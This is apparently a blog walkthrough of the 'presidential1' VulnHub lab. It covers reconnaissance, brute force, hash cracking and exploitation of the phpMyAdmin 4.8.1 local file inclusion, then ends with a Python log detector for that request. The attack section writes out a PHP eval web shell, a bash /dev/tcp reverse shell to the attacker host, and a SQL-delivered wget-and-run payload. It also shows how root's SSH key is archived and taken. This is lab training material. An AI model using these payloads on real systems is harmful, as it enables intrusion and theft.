【vulnhub】presidential1
2022-07-07 00:20:00 【Happy star】
Blog home page: Happy star
Series column: vulnhub
Follows, likes, favourites and comments are welcome.
Started: 6 July 2022
The author's level is very limited; if you find an error, please let me know. Thank you!
Contents
- Host discovery
- Port scanning
- Visiting port 80
- Directory scanning with dirb
- Information gathering with nikto and whatweb
- Scanning the directory again with dirsearch
- Trying the obtained account and password against the SSH service
- Crawling a wordlist with cewl
- Brute-forcing SSH with hydra
- Subdomain brute-forcing
- Logging in to the database
- Cracking the hash with john
- Trying to log in to SSH as admin (fails)
- Exploiting the phpMyAdmin vulnerability
- Privilege escalation
Because the target machine is in host-only mode, we set Kali to host-only mode as well.
Host discovery
arp-scan -l
Discard hosts whose host number is very low or very high, since those are probably the gateway or similar.
So the target IP is 192.168.110.128
Port scanning
nmap -sV -p- 192.168.110.128
Visiting port 80
The page shows someone's name; cewl may be needed later.
Directory scanning with dirb
dirb http://192.168.110.128
The assets directory: let's take a look.
Checked the website source code to see whether any sensitive files had been scanned out; none were found.
The cgi-bin directory returns 403.
Information gathering with nikto and whatweb
whatweb 192.168.110.128
nikto --url 192.168.110.128
Visiting config.php: the file does exist, but it is empty.
Then tried whether a backup copy exists: config.phps, config.php.bak
Visit icons/README
Suddenly dirb became suspect: why were these files not scanned out?
Scanning the directory again with dirsearch
./dirsearch.py -u http://192.168.110.128
It does find config.php.bak.
Because I thought it would download automatically, I did not check the source code.
Got the database account and password.
Open about.html
The other sections cannot be accessed; only HOME and ABOUT work.
So this page is a static page.
Trying the obtained account and password against the SSH service
ssh -p 2082 [email protected]
I don't know what is going on here.
Crawling a wordlist with cewl
cewl http://192.168.110.128 -w dic0.txt
Brute-forcing SSH with hydra
hydra -L dic0.txt -P dic0.txt ssh://192.168.110.128
Looking at this error message together with the votebox error message above, it seems a key is required rather than a password.
Subdomain brute-forcing
There is no more information to use, so try brute-forcing subdomains.
But right now we only have the server's IP address and no domain name.
So the website's domain name is votenow.local; add it to the hosts file:
vim /etc/hosts
192.168.110.128 votenow.local
Wanted to use gobuster or OneForAll to brute-force subdomains, but they are not configured properly.
Use wfuzz instead:
wfuzz -w /usr/share/wordlists/dirbuster/directory-list-lowercase-2.3-medium.txt -H "Host: FUZZ.votenow.local" --hw 854 --hc 400 votenow.local
The same fuzz parameters were used on the Prime1 machine: -w specifies the wordlist, -H specifies a request header, and --hw and --hc hide responses with the given word count and status code respectively.
Get a subdomain: datasafe
Write it into the hosts file:
vim /etc/hosts
192.168.110.128 datasafe.votenow.local
Logging in to the database
Log in with the obtained database account.
Got the admin account and its password hash.
Cracking the hash with john
See: [Try to Hack] john hash cracking tool
admin's password is Stella.
Trying to log in to SSH as admin (fails)
ssh -p 2082 [email protected]
A key really is required.
Exploiting the phpMyAdmin vulnerability
The page reveals the version number, 4.8.1.
searchsploit phpmyadmin
cp /usr/share/exploitdb/exploits/php/webapps/50457.py /root
I don't know how to use this RCE CVE.
Following other write-ups, use the file inclusion exploit instead:
phpMyAdmin 4.8.1 - (Authenticated) Local File Inclusion (1) | php/webapps/44924.txt
phpMyAdmin 4.8.1 - (Authenticated) Local File Inclusion (2) | php/webapps/44928.txt
searchsploit -x php/webapps/44928.txt
Construct the URL:
http://datasafe.votenow.local/index.php?target=db_sql.php%253f/../../../../../../../../var/lib/php/session/sess_d4qpkliuhiq1anqdkqgc8v10qnq5teq8
Reproduced successfully.
Now we can write a one-line PHP web shell: <?php eval($_GET["ant"]); ?>
select "<?php echo file_put_contents('/var/www/html/s.php',base64_decode('PD9waHAgZXZhbCgkX0dFVFsiYW50Il0pOyA/Pg=='));exit;?>"
Something may have gone wrong writing it; the file could not be reached, so go straight for a reverse shell:
cd /var/www/html
echo 'bash -i >& /dev/tcp/192.168.110.129/1100 0>&1' > shell.sh
python -m SimpleHTTPServer 80
nc -lvvp 1100
Execute the SQL:
select '<?php system("wget 192.168.110.129/shell.sh; chmod +x shell.sh; bash shell.sh");exit;?>'
Get an interactive shell:
python -c 'import pty; pty.spawn("/bin/bash")'
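As an added, defender-side illustration of the inclusion request used above (this is not code from the original post): the %253f in the URL decodes twice to a ?, which is what lets the target value pass phpMyAdmin 4.8.1's page whitelist while the include path still walks up into the PHP session directory. The example below parses constructed Apache access-log lines and flags target= values that decode to a traversal, needed more than one decode pass, or point at the session directory; the session id in the sample is a placeholder.

```python
import re
from urllib.parse import unquote

# Constructed sample access-log lines (not from the original post); the
# session id in the first line is a placeholder.
SAMPLE_LOG = """\
192.168.110.129 - - [06/Jul/2022:10:01:02 +0000] "GET /index.php?target=db_sql.php%253f/../../../../../../../../var/lib/php/session/sess_PLACEHOLDER HTTP/1.1" 200 5123
192.168.110.129 - - [06/Jul/2022:10:01:10 +0000] "GET /index.php?target=server_sql.php HTTP/1.1" 200 4012
192.168.110.129 - - [06/Jul/2022:10:02:00 +0000] "GET /about.html HTTP/1.1" 200 2218
192.168.110.129 - - [06/Jul/2022:10:03:30 +0000] "GET /index.php?target=db_sql.php%3f/../../../etc/passwd HTTP/1.1" 200 1800
"""

# Common Log Format: client ident user [time] "method path proto" status ...
LOG_RE = re.compile(r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] '
                    r'"\S+ (?P<path>\S+) \S+" \d{3}')

def fully_decode(value, max_rounds=5):
    """Undo nested percent-encoding; returns (decoded, passes) where passes
    counts rounds that changed the string: 0 plain, 1 for %3f, 2 for %253f."""
    passes = 0
    while passes < max_rounds:
        decoded = unquote(value)
        if decoded == value:
            break
        value, passes = decoded, passes + 1
    return value, passes

def find_lfi_attempts(log_text):
    """Flag phpMyAdmin 'target' values that, fully decoded, contain traversal,
    needed more than one decode pass, or point into the PHP session dir."""
    hits = []
    for line in log_text.splitlines():
        m = LOG_RE.match(line)
        if not m or '?' not in m.group('path'):
            continue
        query = m.group('path').split('?', 1)[1]
        params = dict(p.split('=', 1) for p in query.split('&') if '=' in p)
        if 'target' not in params:
            continue
        decoded, passes = fully_decode(params['target'])
        reasons = []
        if '../' in decoded or '..\\' in decoded:
            reasons.append('traversal')
        if passes > 1:
            reasons.append('double-encoding')
        if '/var/lib/php/session' in decoded:
            reasons.append('session-file')
        if reasons:
            hits.append({'ip': m.group('ip'), 'target': decoded, 'reasons': reasons})
    return hits
```

Run find_lfi_attempts(SAMPLE_LOG) to see the two flagged requests; only the first carries all three reasons, the fourth line is single-encoded traversal.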
Privilege escalation
su admin
tar -cvf key.tar /root/.ssh/id_rsa
tar -xvf key.tar
cd root/.ssh
ssh -i id_rsa root@localhost -p 2082
End